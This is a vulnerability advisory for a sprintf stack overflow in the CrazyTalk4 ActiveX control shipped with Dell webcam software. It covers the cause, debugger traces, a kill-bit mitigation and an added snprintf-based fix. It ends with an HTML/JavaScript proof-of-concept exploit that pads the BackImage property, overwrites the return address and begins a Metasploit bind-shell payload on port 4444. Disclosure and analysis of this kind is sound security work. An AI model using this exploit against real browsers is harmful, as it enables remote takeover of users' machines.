Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability

Tested against:
  Microsoft Windows Vista SP2
  Microsoft Windows XP SP3
  Microsoft Windows 2003 R2 SP2
  Internet Explorer 7/8/9

Download URL of a test version:
  http://search.dell.com/results.aspx?c=us&l=en&s=gen&cat=sup&k=Dell+SX2210+monitor&rpp=12&p=1&subcat=dyd&rf=all&nk=f&sort=K&ira=False&~srd=False&ipsys=False&advsrch=False&~ck=anav

File tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe
This package contains the Dell Webcam Central software developed by Creative Technologies for Dell.

Info:
  http://dell-webcam-central.software.informer.com/
  http://live-cam-avatar-creator.software.informer.com/
  http://www.google.com/search?channel=s&hl=en&biw=1024&bih=581&q=13149882-F480-4F6B-8C6A-0764F75B99ED
  http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=crazytalk4.ocx&btnG=Search
  http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=CrazyTalk4Native.dll&btnG=Search
  http://dell-webcam-central.software.informer.com/users/
  http://live-cam-avatar-creator.software.informer.com/users/

I think this is a very common ActiveX, probably bundled with Dell notebooks.

Background:
The mentioned software carries a third-party ActiveX control with the following settings.
  Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
  ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
  CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
  Safe for Scripting (Registry): True
  Safe for Initialization (Registry): True
Because the control is registered as safe for scripting and safe for initialization, Internet Explorer will instantiate it from a remote web page and let that page set its properties and call its methods without prompting. Setting the kill bit for this CLSID (Compatibility Flags = 0x400 under the ActiveX Compatibility key) prevents IE from loading it at all.

Vulnerability:
The 'BackImage', 'ScriptName', 'ModelName' and 'SRC' properties can be used to trigger a buffer overflow condition.
The crazytalk4.ocx ActiveX control loads the CrazyTalk4Native.dll library and, while constructing a local file path from the property value, calls sprintf() with the format "%s%s%s" into a fixed-size stack buffer without checking the resulting length. The attacker-controlled property is the second %s, appended to a temp-directory prefix, so the number of bytes needed to reach a given stack slot depends on the length of the current user's temp path (45 bytes in the trace below).

Call stack of main thread
  Address   Stack     Procedure / arguments                                   Called from
  0012EE24  023D4FAB  msvcrt.sprintf                                          CrazyTal.023D4FA5
  0012EE28  0012F180    s = 0012F180
  0012EE2C  023F431C    format = "%s%s%s"
  0012EE30  042A2D6C    <%s> = "C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\"
  0012EE34  0012EF5C    <%s> = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  0012EE38  0012EE58    <%s> = ""
  0012F164  023D601D  CrazyTal.023D4F20

Code, CrazyTalk4Native.dll:
  ...
  023D4F80  85C0              test eax,eax
  023D4F82  74 38             je short CrazyTal.023D4FBC
  023D4F84  8B9C24 2C030000   mov ebx,dword ptr ss:[esp+32C]
  023D4F8B  8D4424 1C         lea eax,dword ptr ss:[esp+1C]
  023D4F8F  8D8C24 20010000   lea ecx,dword ptr ss:[esp+120]
  023D4F96  50                push eax
  023D4F97  81C6 443B0000     add esi,3B44
  023D4F9D  51                push ecx
  023D4F9E  56                push esi
  023D4F9F  68 1C433F02       push CrazyTal.023F431C              ; ASCII "%s%s%s"
  023D4FA4  53                push ebx
  023D4FA5  FF15 E4F33E02     call dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
  ...

The attached proof-of-concept code overwrites both EIP and the SEH chain.
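The following is an added example written for this page; it is not code from the advisory, from Reallusion or from Dell. It models the path-building step shown in the call stack, sprintf(s, "%s%s%s", temp_prefix, property_value, "") into a fixed-size stack buffer, as a length calculation rather than an actual overflow, so the file runs safely, and puts a bounded replacement beside it. The destination size PATH_BUF, the sample file name and the 350-byte payload length are assumptions for illustration; the advisory does not state the real buffer size. The temp prefix is copied verbatim from the trace above.

```c
/*
 * Added example (not from the advisory or the CrazyTalk4 control).
 * Models: sprintf(s, "%s%s%s", temp_prefix, attacker_value, "") into a
 * fixed-size stack buffer, and a hardened replacement using snprintf.
 */
#include <stdio.h>
#include <string.h>

/* Assumed destination size for illustration; the real size is not on the page. */
#define PATH_BUF 260

/* Temp-directory prefix exactly as it appears in the advisory's call stack (45 bytes). */
static const char kTempPrefix[] = "C:\\DOCUME~1\\Admin\\LOCALS~1\\Temp\\RLTMP\\~RW463\\";

/* Bytes sprintf("%s%s%s") writes into the destination, excluding the NUL.
 * This is the quantity the vulnerable code never compares against the buffer. */
size_t formatted_len(const char *prefix, const char *name, const char *suffix)
{
    return strlen(prefix) + strlen(name) + strlen(suffix);
}

/* 1 if an unchecked sprintf of these three parts would run past bufsz bytes. */
int would_overflow(const char *prefix, const char *name, const char *suffix, size_t bufsz)
{
    return formatted_len(prefix, name, suffix) + 1 > bufsz;
}

/* Number of attacker-controlled bytes needed before byte slot_offset of the
 * formatted string is reached.  Because the attacker string is the second %s,
 * this shifts with the prefix length, i.e. with the logged-in user's temp path. */
size_t pad_to_slot(const char *prefix, size_t slot_offset)
{
    size_t plen = strlen(prefix);
    return slot_offset > plen ? slot_offset - plen : 0;
}

/* Hardened replacement: bounded write, and truncation is an error rather than
 * a silently wrong path.  Returns 0 on success, -1 if the result does not fit;
 * on failure out[0] is set to NUL so a caller cannot use a partial path. */
int build_path_checked(char *out, size_t outsz, const char *prefix,
                       const char *name, const char *suffix)
{
    int n;
    if (outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s%s%s", prefix, name, suffix);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Feeds a 350-byte run of 'a' (constructed, like the advisory's BackImage
 * string) to the checked builder.  Returns 1 if it was rejected and the
 * buffer left empty, 0 otherwise. */
int long_payload_is_rejected(void)
{
    char path[PATH_BUF];
    char evil[351];
    memset(evil, 'a', sizeof evil - 1);
    evil[sizeof evil - 1] = '\0';
    return build_path_checked(path, sizeof path, kTempPrefix, evil, "") == -1
        && path[0] == '\0';
}

int main(void)
{
    char path[PATH_BUF];

    /* A short, constructed file name fits and is accepted. */
    if (build_path_checked(path, sizeof path, kTempPrefix, "sample.bmp", "") == 0)
        printf("ok: %s\n", path);

    /* The long payload is refused instead of overrunning the buffer. */
    printf("long payload rejected: %d\n", long_payload_is_rejected());

    /* With this 45-byte prefix, the PoC's 216 'A's end at byte 261 of the
     * formatted string; a user whose short name is 8 characters (ADMINI~1)
     * adds 3 bytes of prefix and shifts the same slot 3 bytes earlier. */
    printf("pad to byte 261: %zu\n", pad_to_slot(kTempPrefix, 261));
    return 0;
}
```

The check in build_path_checked relies on snprintf returning the length it would have written; anything at or beyond outsz means truncation, which for a path is as bad as an overflow, so it is rejected outright. On the Windows CRT that this control links against, _snprintf does not NUL-terminate on overflow and returns -1, so a port of this guard there should use _snprintf_s or StringCchPrintf rather than assume C99 semantics.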
Note:
0:008> lm -vm CrazyTalk4Native
start    end        module name
021c0000 0220b000   CrazyTalk4Native   (deferred)
    Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll
    Image name: CrazyTalk4Native.dll
    Timestamp:        Thu May 17 12:13:42 2007 (464C2AD6)
    CheckSum:         00048AB2
    ImageSize:        0004B000
    File version:     4.5.815.1
    Product version:  4.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      C3D
    ProductName:      CrazyTalk4 ActiveX Control Module
    InternalName:     CrazyTalk4
    OriginalFilename: CrazyTalk4.OCX
    ProductVersion:   4, 0, 0, 1
    FileVersion:      4, 5, 815, 1
    PrivateBuild:     4, 5, 815, 1
    SpecialBuild:     4, 5, 815, 1
    FileDescription:  CrazyTalk4 Native Control Module
    LegalCopyright:   Copyright (C) 2005
    LegalTrademarks:  Copyright (C) 2005
    Comments:         Copyright (C) 2005

POC:

<!--
Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit
bind shell, IE-NO-DEP

Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
Safe for Scripting (Registry): True
Safe for Initialization (Registry): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100 height=100></object>
<script>
// bad chars:
// \x80,\x82-\x8c,\x8e,\x91-\x9c,\x9e-\x9f
var i;
var x = "";
// padding up to the saved return address
for (i = 0; i < 216; i++) { x = x + "A"; }
x = x + "\x50\x24\x40\x77"; // 0x77402450 jmp EBP, user32.dll - change for your need
// padding between the return address and the shellcode
for (i = 0; i < 140; i++) { x = x + "A"; }
// windows/shell_bind_tcp - 696 bytes
// http://www.metasploit.com
// Encoder: x86/alpha_mixed
// EXITFUNC=seh, LPORT=4444, RHOST=
x = x + "‰åÚÐÙuô^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
try { obj.BackImage = x; } catch (e) { }
</script>